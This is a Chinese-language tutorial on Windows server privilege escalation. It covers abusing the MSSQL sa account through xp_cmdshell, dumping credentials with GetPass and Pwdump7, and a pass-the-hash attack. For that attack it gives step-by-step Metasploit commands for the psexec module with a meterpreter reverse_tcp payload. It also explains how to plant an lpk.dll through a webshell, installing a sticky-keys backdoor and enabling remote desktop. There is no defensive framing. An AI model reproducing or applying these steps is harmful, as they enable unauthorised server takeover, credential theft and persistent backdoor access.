提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權

(一)、Mssql提權

必要條件：獲取到mssql資料庫最高許可權使用者sa的賬號密碼

Mssql預設埠：1433

Mssql最高許可權使用者：sa

得到sa密碼之後，通過工具直接連線上去。

MSSQL自帶了一個XP_CMDSHELL用來執行CMD命令。

(二)、GetPass 提權

一款獲取計算機使用者賬號密碼的工具

(三)、hash傳遞入侵 msf載入

Hash 演算法：windows密碼的加密方式

Msf下載：http://www.rapid7.com/products/metasploit/download.jsp

以下使用Kali演示

Msf使用：

msfconsole   //啟動終端

use exploit/windows/smb/psexec //用到模組

show options //檢視模組選項屬性

set PAYLOAD windows/meterpreter/reverse_tcp   //設定漏洞利用載體

Show targets //檢視模組的攻擊目標屬性

set LHOST //設定本機地址
set RHOST 192.168.0.254 //設定屬性目標主機地址
set SMBUser administrators //設定屬性使用者

set SMBPass  xxx  //設定屬性密文hash

目標主機的hash怎麼獲取了?可以通過Pwdump7這個工具來獲取hash值

複製以下一段就行了

exploit  //開始攻擊

獲取當前shell,執行命令

(四)、lpk提權

觸發：目錄下存在exe檔案被執行，他的特點是每個可執行檔案執行之前都要載入該檔案，windows系統是先判斷當前檔案目錄是否存在此檔案，如果目錄下存在該檔案則執行,如果不存在則會執行system32目錄下的dll。

啟動方案：3389遠端桌面連線啟動（連續shift，然後按熱鍵）

提權方案：生成lpk.dll，通過webshell上傳至檔案目錄，等待管理員去觸發exe程式。

執行LPK Setch這個工具選擇，2鍵啟動，此時的2鍵3鍵值為LPK Sethc內建固定的數字，比如65,66就對應a與b。

然後點選生成，將生成的lpk.dll上傳至任意目錄,並執行其中的任何一個exe檔案,lpk.dll將會自動替換為shift後門。

我這裡把它生成到了軟體的目錄，然後點選執行軟體

然後遠端連線，連續按五次shift鍵，會出現下面的提示

接著同時按下組合鍵(也就是在哪裡設定的65,66,對應的A,B)，就會出現下面的密碼框

輸入密碼，就會進入下面的介面!!!

還可以用來執行軟體，比如用來開3389，在生成lpk.dll是選中

生成lpk.dll然後放到任意目錄下，未執行軟體之前遠端是關閉的

然後執行exe軟體，你好發現遠端被開啟了。